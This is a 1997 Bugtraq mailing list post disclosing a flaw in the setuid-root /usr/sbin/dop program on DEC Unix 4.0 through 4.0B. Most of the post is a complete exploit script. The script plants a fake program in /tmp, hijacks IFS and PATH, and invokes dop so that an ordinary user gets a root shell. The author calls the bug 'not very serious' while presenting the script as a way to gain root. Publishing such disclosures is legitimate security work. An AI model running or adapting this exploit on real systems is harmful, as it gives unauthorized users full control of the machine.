Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

/usr/sbin/dop and DEC Unix 4.0*

From: jon.thingvold () USIT UIO NO (jon.thingvold () USIT UIO NO)
Date: Tue, 4 Mar 1997 10:28:14 +0100

In Norwegian dop is another word for drug, such as in drug abuse (dop
missbruk). In  DEC Unix 4.0, 4.0A and 4.0B you will find /usr/sbin/dop
setuid root. This program has a small and not very serious bug(?):

-------------------------cut here------------------------------------
#!/bin/sh
cat > /tmp/usr <<EOF
#!/bin/sh
IFS="   "
export IFS
exec /bin/sh
EOF
chmod 755 /tmp/usr
IFS=/ PATH=/tmp:$PATH /usr/sbin/dop crack-user=root
-------------------------cut here------------------------------------

run this script and get a free root shell.

Jon.
--
Your lucky number is 34
Noisekiller: compress -f /dev/audio
Previous By Date Next
Previous By Thread Next

Current thread: